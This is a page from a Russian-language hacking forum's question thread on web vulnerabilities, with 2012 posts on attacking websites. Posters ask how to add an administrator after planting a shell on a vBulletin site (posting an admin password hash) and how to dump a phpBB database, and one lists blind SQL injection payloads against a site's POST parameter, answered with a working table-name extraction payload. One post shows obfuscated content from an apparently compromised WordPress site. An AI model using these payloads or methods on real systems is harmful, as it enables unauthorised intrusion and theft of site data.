HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [Задай Вопрос - Получи Ответ]
   
Ответ
Страница 41 из 86 « Первая < 31 37 38 39 40 41 42 43 44 45 51 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #401  
Старый 06.07.2012, 22:11
klb
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
хелп

есть читалка на сайте прав читать логи нету перерыл всё что можно и не зя

тока системных часть показывает и усё ! что можно ещё попробовать ?
 
Ответить с цитированием

  #402  
Старый 10.07.2012, 03:47
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию
Цитата:
Сообщение от klb  
klb said:
есть читалка на сайте прав читать логи нету перерыл всё что можно и не зя
тока системных часть показывает и усё ! что можно ещё попробовать ?
забить
 
Ответить с цитированием

  #403  
Старый 27.07.2012, 16:30
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
Ребят, что за цмска?

http://www.be2.nl/
 
Ответить с цитированием

  #404  
Старый 27.08.2012, 18:06
shumaher
Новичок
Регистрация: 16.02.2009
Сообщений: 0
Провел на форуме:
10983

Репутация: 0
По умолчанию
Залил шелл в vBulletin® Version 4.2.0

каким sql запросом добавить нового админа? хэш действующего сломать не осилил

Цитата:
Сообщение от None  
admin2000:43f439f1c587967e473a3df5da989221
 
Ответить с цитированием

  #405  
Старый 31.08.2012, 15:12
CoBecTb
Guest
Сообщений: n/a
Провел на форуме:
3273

Репутация: 0
По умолчанию
Есть админка на phpbb - как слить базу, что то ненайду?
 
Ответить с цитированием

  #406  
Старый 02.09.2012, 18:12
jkchief
Guest
Сообщений: n/a
Провел на форуме:
977

Репутация: 0
По умолчанию
Всем привет, нашел скулю, но очень она странная.

Помогите раскрутить...

Ссылку прямую дать не могу

Но может кто подскажет варианты, я хочу ее раскрутить:

Итак детали : Есть некий сайт, скажем

http://site.com

Где по следующей ссылке акунетикс нашел скулю блинд скл инжекшн.

http://site.com/misc/print_version.php

Уязвимость касается POST параметра

page was set to /rus/search.php'=sleep(2)='

Полные пост данные:

name=blah&page=/rus/search.php'=sleep(2)='

SQLMAP ее не находит.

Реакция сервера:

1) sleep(2) - засыпает на 20 секунд. Чтобы заснул на 1 секунду, приходится ставить sleep(0.1) - почему так непонятно

2) пробовал следующие варианты:

Не засыпаетИли не засыпает на добавочный слип)

page=blah'=sleep(0.2)='

page='=sleep(0.2)='

page=/rus/search.php'=sleep(0.1)= '

page=/rus/search.php'=sleep(0.1)='" AND (BENCHMARK(100000,SHA1(CURRENT_USER)))

page=/rus/search.php'=sleep(0.1)='" UNION SELECT (BENCHMARK(100000,SHA1(CURRENT_USER))) --

page=/rus/search.php'=(BENCHMARK(100000,SHA1(CURRENT_USER))) =1"

page=/rus/search.php'= (BENCHMARK(100000,SHA1(CURRENT_USER)))='

page=/rus/search.php='=SLEEP(0.1)+(BENCHMARK(100000,SHA1(CUR RENT_USER)))='

page=/rus/search.php'=sleep(0.1)=' AND WHERE (BENCHMARK(100000,SHA1(CURRENT_USER)))=1

page=/rus/search.php'=(IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)
 
Ответить с цитированием

  #407  
Старый 02.09.2012, 18:26
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
to jkchief

Попробуйте так:

Код:
Code:
page=/rus/search.php'=(if(substring((select(table_name)from(information_schema.tables)where(table_schema!='information_schema')limit/**/0,1),1,1)='a',1,sleep(0.1)))='
 
Ответить с цитированием

  #408  
Старый 05.09.2012, 10:35
rzee
Guest
Сообщений: n/a
Провел на форуме:
2130

Репутация: 0
По умолчанию
Ребят подскажите, что творится? Проблема началась на одном сайте WP, стоит плагин уведомления об каких либо изменениях файлов на сервере. Стали приходить сообщения Changed:

wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i

Changed:

/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/4d2fi

Changed:

wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i

В общем каждый день и по нескольку раз

Пару жней назад такое же началось и на другом сайте... При просмотре, выдает набор цифр, как понимаю закодированно, пытался раскодировать, но выдает китайские символы... Вот несколько текстов, которые находятся по уведомляемым изменениям:

Цитата:
Сообщение от None  
X+LUAc7Xa2IS1JqSHF9ms1f3VhHXepe0SKhrSoIhJdEChwXRZ5 jJKiNUmhVAqU+6MkBHKtAUR/Y/2BDhEyri4+lhjD2PMClFPZWLGdNrlyMrkWpuTLRXz0sGhpvGox j8hM9F3WZ0gVxRmgkxnYBDvnOaWZEzS+KPUeugpmgh09rFTtQv 7stU2PFB/akvyiITVgVQ5WEKvncpVZPYDFjHYPVRy8xHvZhgR9XR1RPcKa1 FLHuFTxZ0XlUl7toAPR+HRpykevhTVoK/fhWI6lklEwZ+e2y206vVxLFhCesi9LG4RLJgE+ILupTLNVWh9A h3+iulTCkaQ1LMhTINpYkCuyYqUio8QPMLIsmLiamg75Q6FN+J XrKlXPnit7qFzgpMj/zhSdfyJpnFT2efhB/JA2ez07crrgBc7Nn0dq9zm9dTI2N9Rr19cajWD6ZDU71AeM2Tq RkeooTR1gbegUFFvygMc6uU1hE6ozvDB8IVHzqv33y2aMbuydD p1Y9LtRr9wAOPvghQh2Zaz6XLZ67JEc7+sU/gc3HrcFA8JGqu0sXHAxLFjLkb6qed0csjyZ0ncxZ64G05NXR98 82V/oECYglmkywirCRLpnrGs1S8oPoLUbHgtrcggstdOO9iBEMWSwW NpSi0MVoZEXLXJuLF1OhPc+YkJDlAPVHmj85w1Sih7GH848Mxe hFqkKEmahejRPcNhQ0WmgBZEyOi5GNPwsGOCSX/6t+aJ/Av33urGg9m7R52iMuyvgDbo0O5i6avmnghaQHWAfQELKyhet4w v0NlQYd9Aey7HFYfN/YbfqAgKMAPfASFmoyGY4Xvft6KgZ94DtkgciozEC960PGA933q o13IT8BcU4MzMt2ay+nQJMETBalBAMwmR3blfFzqbj722HAAaW dWG/pVXGTcl8Zk6avv6IGHTgbqNSXH5k8WgOVPppRFfTpGT7CFZv4j CYs9oBXS4cHm
Цитата:
Сообщение от None  
FBCF/X7B628k3tz0soDj015JuO+vapllfgYRxDOPfCb629fBlwnO64F b8hfYiXz9IPe8gh2hRw8vpH+/4bGSwpxBiJQLIedUYD0A0BAZSJtoADTJc+i2Yp0QfKBLrowjig mBloGIhsK1Vw0Oxl6HufXEoiLENsuGAFJwPsxEz/+f56OpLKXSqjuU2Pw8ZTyXSwH/ivufNSwyHW2c+SyRgg5VrCkCjsePUYqE3lH0E1xomnhERYETOC vmJ3V4WCOpOE5TRC/CUgojnWB2
Но при каждом уведомлении об изменении текст в файле другой. Что это и как бороться?
 
Ответить с цитированием

  #409  
Старый 10.09.2012, 20:04
persmash
Новичок
Регистрация: 26.04.2010
Сообщений: 0
Провел на форуме:
2833

Репутация: 0
По умолчанию
Привет там,

Есть кто-нибудь, кто знает, как использовать этот подвиг?

http://3dwebdesign.org/forum/index.php?showtopic=1113
 
Ответить с цитированием

  #410  
Старый 11.09.2012, 17:24
FlooP1k
Guest
Сообщений: n/a
Провел на форуме:
30137

Репутация: 48
По умолчанию
Цитата:
Сообщение от persmash  
persmash said:
Привет там,
Есть кто-нибудь, кто знает, как использовать этот подвиг?
http://3dwebdesign.org/forum/index.php?showtopic=1113
Об этом можно забыть, просто очередной вебмастер который косит под "знающего".

Я правда понятия не имею причем тут RFI он сказал, мне кажется он даже не знает что это. А фраза: "2. Hacker make POST requests to com_installer or com_templates" это люди просто пытались залить шелл через админку. Я уверен, что сайты его взломали через SQL одного из дырявых компонентов.

Единственное, что он правильно написал как защитится от практически 95% взломов на Joomle.
 
Ответить с цитированием
Ответ
Страница 41 из 86 « Первая < 31 37 38 39 40 41 42 43 44 45 51 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ